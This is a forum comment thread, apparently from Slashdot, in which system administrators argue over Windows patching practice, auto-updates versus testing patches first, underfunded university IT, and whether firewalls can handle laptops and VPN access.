"My Co-Worker and I manage about 375 PCs at a University which has no firewall,"
"the Sysadmins need to be ... fired."

"You should have had auto-updates turned on for your boxes"
"the Sysadmins need to be ... fired."

"We had autoupdates on,"
"the Sysadmins need to be ... fired."

Reasonable boarder security, strict firewall rules, roll-over security, implementing patchs and updates after they've been tested within a "sandbox" or other non-production machine, and constant security/threat analysis - these are the building blocks to a secure and operational infrastructure; not turning on "auto-update" for all your windows boxes. That's absolutely ridiculous. Next time a faulty patch comes down the line, it's going to take down some, most, or even all of your machines. I can remember Microsoft security patches causing anything from network connection problems to out-right system corruption requiring repair/reinstallation of the OS. Be very careful throwing stones at other admins when your own procedures are just plain laughable.

"So, uh, what were you other Windows admins doing when you should have been doing your job?"

Where was I? Reviewing the procedures I have in place to ensure that this type of vulnerablity never touches anything that would be vulnerable to it, and ensuring that all critical systems are buffered in case of internal infection through user stupidity. Where was I? Doing my job, correctly.

Re:On the way?

[Sethb]

You want to know what a real University setting is like? I've worked at 2 of the 3 state Universities here, and generally it's a mishmash of 20% Win95, 40% Win98, 20% Win2000, and 20% Windows XP machines, none of which authenticate to a domain, administered by someone who started working there as a student, but was kept on after graduation because they were cheap labor.

Patches? Well the user should take care of that, right? After all, they've got Internet Explorer, they can surely remember to visit WindowsUpdate and get patches on their own.

Oh, AntiVirus definitions? Well, our software doesn't update those automatically, you've got to click the icon and push update every month or so, but the users can do that.

None of the above is hyperbole, and were actually the standard practices as recently as 18 months ago.

Heck, doing testing? That'd require a SECOND computer for each technician! That'd cost money! We can't afford to but TWO computers for one person, we're already splurging on 1 IT person per 500 computers! Oh, and we gave you 1 student who's slightly above minimum wage too. What more do you want?

Re:firewall = good

[wik]

Sure. How about people who bring their laptops in and plug them into the wired network? Okay, let's DMZ them. Now, how do they get to the corporate network?

If your answer is "they don't", then you've effectively taken away the reason for having a network in the first place. If your answer is VPN, then you've left a gaping tunnel from the outside, through your firewall.

My point is not that firewalls are only one piece of the security plan, but they cannot solve everything.